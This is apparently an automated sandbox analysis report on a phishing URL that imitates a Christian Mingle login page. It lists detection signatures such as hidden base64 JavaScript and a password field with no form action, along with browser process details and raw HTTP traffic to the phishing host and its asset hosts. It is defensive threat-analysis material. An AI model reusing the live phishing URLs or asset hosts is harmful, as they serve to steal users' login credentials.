Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=

Overview

General Information

Sample URL:https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=
Analysis ID:1526832
Tags:openphish
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found HTTP page in a blob
HTML page contains suspicious base64 encoded javascript
Phishing site detected (based on logo match)
Detected non-DNS traffic on DNS port
Found iframes
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 4852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 3568 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1996,i,2053602945635669947,100357867303629952,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 2948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

Phishing

barindex
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0DOM page: Blob-based
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0HTTP Parser: Base64 decoded: document.write
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0Matcher: Template: apple matched
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0HTTP Parser: Iframe src: index_1.html
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0HTTP Parser: Iframe src: index_2.html#id=0torvgr8u95&host=www.christianmingle.com&sentry=true&reportapi=https%3A%2F%2Faccounts.hcaptcha.com&recaptchacompat=true&custom=false&hl=en&tplinks=on&sitekey=9ae98470-5ff1-45bc-8f0e-a8ec6f204ce7&theme=light
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://www.spark.net/our-story/HTTP Parser: Base64 decoded: AIzaSyCBTROq6LuvF_IE1r46-T4AeTSV-0d7my8
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0HTTP Parser: Title: Christian Mingle - Login does not match URL
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0HTTP Parser: <input type="password" .../> found
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0HTTP Parser: No <meta name="author".. found
Source: blob:https://chattts-49f1.beszyrecala.workers.dev/72b8d5d8-909a-42bb-a197-ad8f18b1e6d0HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:58537 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:58583 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:58637 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:58679 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:58777 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 6MB later: 40MB
Source: global trafficTCP traffic: 192.168.2.6:58516 -> 1.1.1.1:53
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
Source: global trafficHTTP traffic detected: GET /16059c05-eb99-4880-8bcd-d4= HTTP/1.1Host: chattts-49f1.beszyrecala.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.4.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://chattts-49f1.beszyrecala.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /jquery-3.4.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /appboy.min.css HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /880ae5ba69e733fe8f2f738fae4a4697.svg HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /kit-style.css HTTP/1.1Host: kengegame.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /core-awesome.min.css HTTP/1.1Host: kengegame.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /background-styles.css HTTP/1.1Host: kengegame.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9d77aa1062194b9635ee9a90c75217c2.svg HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/user/cb07091a-9803-4eab-aa81-fd133653f44b/fjLo-hhcap.png HTTP/1.1Host: uploads.codesandbox.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tp.png HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /picdir/middle/197-1975093_facebook-instagram-twitter-youtube-google-linkein-twitter-logo.png HTTP/1.1Host: www.pinclipart.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /public/uploads/preview/black-instagram-logo-png-11574831789epgjpjrwg6.png HTTP/1.1Host: starpng.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /c38b46548211dc0a01b864de5360ff89.jpg HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kengegame.web.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /db46390fdb0d15d3d3561232b69daf608858cdd1.ttf HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://chattts-49f1.beszyrecala.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kengegame.web.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /50c990406fd29b27791056f5bd492ff44cfd362e.ttf HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://chattts-49f1.beszyrecala.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kengegame.web.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /0660c9ab1b018a073e06d7a13b0b3959940effba.ttf HTTP/1.1Host: ruletridominium.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://chattts-49f1.beszyrecala.workers.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://kengegame.web.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /880ae5ba69e733fe8f2f738fae4a4697.svg HTTP/1.1Host: ruletridominium.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9d77aa1062194b9635ee9a90c75217c2.svg HTTP/1.1Host: ruletridominium.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/user/cb07091a-9803-4eab-aa81-fd133653f44b/fjLo-hhcap.png HTTP/1.1Host: uploads.codesandbox.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cfuvid=._XNCH1d1zLfrUiFyS3nncmcFBwSXAaSjcbhUhvZEtw-1728225714517-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /tp.png HTTP/1.1Host: ruletridominium.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
